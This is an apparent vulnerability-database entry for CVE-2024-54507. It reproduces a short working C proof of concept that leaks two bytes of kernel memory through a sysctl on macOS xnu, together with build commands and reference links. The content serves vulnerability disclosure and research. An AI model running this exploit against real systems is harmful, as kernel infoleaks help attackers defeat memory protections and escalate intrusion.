Proof Of Concept
Created on 2025-01-24 06:21, updated on 2025-01-24 06:32, by Cédric Bonhomme// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdio.h>
#include <sys/sysctl.h>
void leak() {
uint64_t val = 0;
size_t len = sizeof(val);
sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}
int main() {
leak();
return 0;
}
from https://github.com/jprx/CVE-2024-54507
Related vulnerabilities
Meta
[
{
"ref": [
"https://github.com/jprx/CVE-2024-54507",
"https://jprx.io/cve-2024-54507/"
],
"tags": [
"vulnerability:exploitability=documented",
"vulnerability:information=PoC"
]
}
]